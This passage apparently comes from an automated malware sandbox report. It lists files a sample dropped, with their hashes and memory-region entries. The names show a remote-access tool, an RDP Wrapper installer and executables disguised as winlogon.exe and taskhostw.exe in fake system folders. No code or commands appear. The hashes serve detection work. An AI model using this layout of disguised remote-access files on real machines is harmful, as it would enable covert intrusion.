| SHA512 | 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab |
memory/940-158-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\reg1.reg
| MD5 | 806734f8bff06b21e470515e314cfa0d |
| SHA1 | d4ef2552f6e04620f7f3d05f156c64888c9c97ee |
| SHA256 | 7ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544 |
| SHA512 | 007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207 |
memory/1628-159-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\reg2.reg
| MD5 | 6a5d2192b8ad9e96a2736c8b0bdbd06e |
| SHA1 | 235a78495192fc33f13af3710d0fe44e86a771c9 |
| SHA256 | 4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a |
| SHA512 | 411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d |
memory/4308-161-0x0000000000000000-mapping.dmp
memory/4184-162-0x0000000000000000-mapping.dmp
memory/424-163-0x0000000000000000-mapping.dmp
memory/1432-164-0x0000000000000000-mapping.dmp
memory/2924-165-0x0000000000000000-mapping.dmp
memory/1064-166-0x0000000000000000-mapping.dmp
memory/4388-167-0x0000000000000000-mapping.dmp
memory/4496-168-0x0000000000000000-mapping.dmp
memory/4240-169-0x0000000000000000-mapping.dmp
memory/3500-170-0x0000000000000000-mapping.dmp
memory/2196-171-0x0000000000000000-mapping.dmp
memory/1612-172-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
memory/100-175-0x0000000000000000-mapping.dmp
memory/112-176-0x0000000000000000-mapping.dmp
memory/1612-177-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1612-178-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1612-179-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1612-180-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1612-181-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/4484-182-0x0000000000000000-mapping.dmp
memory/3868-183-0x0000000000000000-mapping.dmp
memory/3808-184-0x0000000000000000-mapping.dmp
memory/1932-185-0x0000000000000000-mapping.dmp
memory/1612-186-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/3380-187-0x0000000000000000-mapping.dmp
memory/2640-188-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
memory/3180-190-0x0000000000000000-mapping.dmp
memory/2352-191-0x0000000000000000-mapping.dmp
memory/3644-193-0x0000000000000000-mapping.dmp
memory/1692-195-0x0000000000000000-mapping.dmp
memory/2640-194-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2640-196-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/3924-197-0x0000000000000000-mapping.dmp
memory/3416-198-0x0000000000000000-mapping.dmp
memory/2640-199-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2640-201-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2412-200-0x0000000000000000-mapping.dmp
memory/2640-202-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/4028-203-0x0000000000000000-mapping.dmp
memory/1432-205-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
memory/3220-204-0x0000000000000000-mapping.dmp
memory/2640-192-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1840-208-0x0000000000000000-mapping.dmp
memory/1432-207-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/4624-210-0x0000000000000000-mapping.dmp
memory/2316-209-0x0000000000000000-mapping.dmp
memory/1432-211-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1004-212-0x0000000000000000-mapping.dmp
memory/1432-213-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1432-214-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2632-216-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
memory/4036-219-0x0000000000000000-mapping.dmp
memory/4228-218-0x0000000000000000-mapping.dmp
memory/1432-215-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/4288-220-0x0000000000000000-mapping.dmp
memory/2372-221-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2372-222-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/2372-223-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1148-226-0x0000000000000000-mapping.dmp
memory/2372-225-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/4268-227-0x0000000000000000-mapping.dmp
memory/2040-224-0x0000000000000000-mapping.dmp
memory/2372-228-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/4044-229-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\rfusclient.exe
| MD5 | b8667a1e84567fcf7821bcefb6a444af |
| SHA1 | 9c1f91fe77ad357c8f81205d65c9067a270d61f0 |
| SHA256 | dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9 |
| SHA512 | ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852 |
C:\ProgramData\Windows\vp8encoder.dll
| MD5 | 6298c0af3d1d563834a218a9cc9f54bd |
| SHA1 | 0185cd591e454ed072e5a5077b25c612f6849dc9 |
| SHA256 | 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172 |
| SHA512 | 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe |
C:\ProgramData\Windows\vp8decoder.dll
| MD5 | 88318158527985702f61d169434a4940 |
| SHA1 | 3cc751ba256b5727eb0713aad6f554ff1e7bca57 |
| SHA256 | 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74 |
| SHA512 | 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff |
memory/1968-234-0x0000000000000000-mapping.dmp
memory/3468-233-0x0000000000000000-mapping.dmp
memory/4488-235-0x0000000000000000-mapping.dmp
memory/1432-236-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/3524-237-0x0000000000000000-mapping.dmp
memory/4536-238-0x0000000000000000-mapping.dmp
memory/5076-240-0x0000000000000000-mapping.dmp
memory/4464-239-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\rfusclient.exe
| MD5 | b8667a1e84567fcf7821bcefb6a444af |
| SHA1 | 9c1f91fe77ad357c8f81205d65c9067a270d61f0 |
| SHA256 | dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9 |
| SHA512 | ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852 |
C:\ProgramData\Windows\rfusclient.exe
| MD5 | b8667a1e84567fcf7821bcefb6a444af |
| SHA1 | 9c1f91fe77ad357c8f81205d65c9067a270d61f0 |
| SHA256 | dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9 |
| SHA512 | ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852 |
memory/3116-244-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1696-245-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/3116-246-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1696-247-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1696-249-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/3116-248-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/3116-250-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1696-253-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\programdata\microsoft\intel\R8.exe
| MD5 | ad95d98c04a3c080df33ed75ad38870f |
| SHA1 | abbb43f7b7c86d7917d4582e47245a40ca3f33c0 |
| SHA256 | 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd |
| SHA512 | 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed |
memory/3116-254-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\ProgramData\Microsoft\Intel\R8.exe
| MD5 | ad95d98c04a3c080df33ed75ad38870f |
| SHA1 | abbb43f7b7c86d7917d4582e47245a40ca3f33c0 |
| SHA256 | 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd |
| SHA512 | 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed |
memory/1696-243-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\rdp\run.vbs
| MD5 | 6a5f5a48072a1adae96d2bd88848dcff |
| SHA1 | b381fa864db6c521cbf1133a68acf1db4baa7005 |
| SHA256 | c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe |
| SHA512 | d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c |
C:\rdp\pause.bat
| MD5 | a47b870196f7f1864ef7aa5779c54042 |
| SHA1 | dcb71b3e543cbd130a9ec47d4f847899d929b3d2 |
| SHA256 | 46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba |
| SHA512 | b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60 |
C:\Programdata\Install\del.bat
| MD5 | 398a9ce9f398761d4fe45928111a9e18 |
| SHA1 | caa84e9626433fec567089a17f9bcca9f8380e62 |
| SHA256 | e376f2a9dda89354311b1064ea4559e720739d526ef7da0518ebfd413cd19fc1 |
| SHA512 | 45255ffea86db71fcfcde1325b54d604a19276b462c8cca92cf5233a630510484a0ecb4d3e9f66733e2127c30c869c23171249cfac3bb39ff4e467830cd4b26b |
C:\Program Files\Common Files\System\iediagcmd.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\ProgramData\Microsoft\Intel\winlog.exe
| MD5 | 4b2dbc48d42245ef50b975a7831e071c |
| SHA1 | 3aab9b62004f14171d1f018cf74d2a804d74ef80 |
| SHA256 | 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724 |
| SHA512 | f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd |
C:\ProgramData\Microsoft\Intel\winlog.exe
| MD5 | 4b2dbc48d42245ef50b975a7831e071c |
| SHA1 | 3aab9b62004f14171d1f018cf74d2a804d74ef80 |
| SHA256 | 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724 |
| SHA512 | f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd |
C:\ProgramData\Microsoft\Intel\winlogon.exe
| MD5 | 2f6a1bffbff81e7c69d8aa7392175a72 |
| SHA1 | 94ac919d2a20aa16156b66ed1c266941696077da |
| SHA256 | dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de |
| SHA512 | ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37 |
C:\ProgramData\Microsoft\Intel\winlogon.exe
| MD5 | 2f6a1bffbff81e7c69d8aa7392175a72 |
| SHA1 | 94ac919d2a20aa16156b66ed1c266941696077da |
| SHA256 | dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de |
| SHA512 | ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37 |
C:\Users\Admin\AppData\Local\Temp\4769.tmp\476A.bat
| MD5 | cfc53d3f9b3716accf268c899f1b0ecb |
| SHA1 | 75b9ae89be46a54ed2606de8d328f81173180b2c |
| SHA256 | f293caa096cc51a511cedd76fd011a275fb8a30b6a93542ded718930a7d12ee9 |
| SHA512 | 0c090e2ed2f3f7b2c00cbb6583df5723a3d0781738eafc37b2e630f46b5b470a5a7dbc44a2f2e8d043f83c753ddf5f72b1d67c0a7e73241e47cd24c92b4ce7d4 |
memory/5560-264-0x0000028323370000-0x0000028323392000-memory.dmp
C:\ProgramData\microsoft\Temp\5.xml
| MD5 | 487497f0faaccbf26056d9470eb3eced |
| SHA1 | e1be3341f60cfed1521a2cabc5d04c1feae61707 |
| SHA256 | 9a8efbd09c9cc1ee7e8ff76ea60846b5cd5a47cdaae8e92331f3b7b6a5db4be5 |
| SHA512 | 3c6b5b29c0d56cfd4b717a964fac276804be95722d78219e7087c4ec787566f223e24421e0e3e2d8a6df5f9c9a5c07f1935f4ba7a83a6a3efa84866e2c1405dd |
C:\ProgramData\Windows\rfusclient.exe
| MD5 | b8667a1e84567fcf7821bcefb6a444af |
| SHA1 | 9c1f91fe77ad357c8f81205d65c9067a270d61f0 |
| SHA256 | dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9 |
| SHA512 | ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852 |
memory/3608-267-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/3608-268-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/3608-269-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/3608-270-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/3608-271-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/5560-272-0x00007FFD618A0000-0x00007FFD62361000-memory.dmp
memory/3608-273-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\Programdata\RealtekHD\taskhostw.exe
| MD5 | 639a6e9e1949265f493c1a3505bc3430 |
| SHA1 | 416384c79557c0a2d1e56e9449ac04d71c9f3477 |
| SHA256 | a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd |
| SHA512 | 57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7 |
C:\ProgramData\RealtekHD\taskhostw.exe
| MD5 | 639a6e9e1949265f493c1a3505bc3430 |
| SHA1 | 416384c79557c0a2d1e56e9449ac04d71c9f3477 |
| SHA256 | a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd |
| SHA512 | 57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7 |
C:\rdp\Rar.exe
| MD5 | 2e86a9862257a0cf723ceef3868a1a12 |
| SHA1 | a4324281823f0800132bf13f5ad3860e6b5532c6 |
| SHA256 | 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8 |
| SHA512 | 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de |
C:\rdp\Rar.exe
| MD5 | 2e86a9862257a0cf723ceef3868a1a12 |
| SHA1 | a4324281823f0800132bf13f5ad3860e6b5532c6 |
| SHA256 | 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8 |
| SHA512 | 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de |
C:\rdp\db.rar
| MD5 | 462f221d1e2f31d564134388ce244753 |
| SHA1 | 6b65372f40da0ca9cd1c032a191db067d40ff2e3 |
| SHA256 | 534e0430f7e8883b352e7cba4fa666d2f574170915caa8601352d5285eee5432 |
| SHA512 | 5e4482a0dbe01356ef0cf106b5ee4953f0de63c24a91b5f217d11da852e3e68fc254fa47c589038883363b4d1ef3732d7371de6117ccbf33842cee63afd7f086 |
C:\programdata\microsoft\temp\H.bat
| MD5 | 76303bb3bb0faa707000df998d8c9f3d |
| SHA1 | 5b25444c92c7625e1ca77ed2eb1b4ba6877ba066 |
| SHA256 | a33af2b70ad8fea8900b6bd31ac7b0aab8a2b8b79e3e27adafbd34bdfcb67549 |
| SHA512 | 25e34a1c1507d96e3a9a9722370ee98c85c900329ea74054783cd486a384f088bfe49e6662aa7eb3fc6db58a0178eb8a8851e13b608831bdd828830b8fdf981c |
C:\Programdata\WindowsTask\winlogon.exe
| MD5 | ec0f9398d8017767f86a4d0e74225506 |
| SHA1 | 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36 |
| SHA256 | 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375 |
| SHA512 | d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484 |
C:\ProgramData\WindowsTask\winlogon.exe
| MD5 | ec0f9398d8017767f86a4d0e74225506 |
| SHA1 | 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36 |
| SHA256 | 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375 |
| SHA512 | d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484 |
C:\rdp\install.vbs
| MD5 | 6d12ca172cdff9bcf34bab327dd2ab0d |
| SHA1 | d0a8ba4809eadca09e2ea8dd6b7ddb60e68cd493 |
| SHA256 | f797d95ce7ada9619afecde3417d0f09c271c150d0b982eaf0e4a098efb4c5ec |
| SHA512 | b840afa0fe254a8bb7a11b4dd1d7da6808f8b279e3bed35f78edcb30979d95380cfbfc00c23a53bec83fe0b4e45dcba34180347d68d09d02347672142bf42342 |
C:\rdp\bat.bat
| MD5 | 5835a14baab4ddde3da1a605b6d1837a |
| SHA1 | 94b73f97d5562816a4b4ad3041859c3cfcc326ea |
| SHA256 | 238c063770f3f25a49873dbb5fb223bba6af56715286ed57a7473e2da26d6a92 |
| SHA512 | d874d35a0446990f67033f5523abe744a6bc1c7c9835fcaea81217dac791d34a9cc4d67741914026c61384f5e903092a2b291748e38d44a7a6fd9ec5d6bba87e |
C:\rdp\RDPWInst.exe
| MD5 | 3288c284561055044c489567fd630ac2 |
| SHA1 | 11ffeabbe42159e1365aa82463d8690c845ce7b7 |
| SHA256 | ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753 |
| SHA512 | c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02 |
C:\rdp\RDPWInst.exe
| MD5 | 3288c284561055044c489567fd630ac2 |
| SHA1 | 11ffeabbe42159e1365aa82463d8690c845ce7b7 |
| SHA256 | ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753 |
| SHA512 | c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02 |
C:\programdata\microsoft\temp\Temp.bat
| MD5 | 9380f21201174ac1267aa944e1096955 |
| SHA1 | e97bd59509694d057daaf698a933092f804fe2e3 |
| SHA256 | ccf47d036ccfe0c8d0fe2854d14ca21d99be5fa11d0fbb16edcc1d6c10de3512 |
| SHA512 | ff4d2172c75a90b1af183fddc483d7a6d908593cb47009f37818066dee021bf7172b8890502fb26d248d39479c6276dce120b570e31f43fcc616db4b43c67e27 |
\??\c:\program files\rdp wrapper\rdpwrap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
memory/2372-288-0x0000000000400000-0x0000000000AB9000-memory.dmp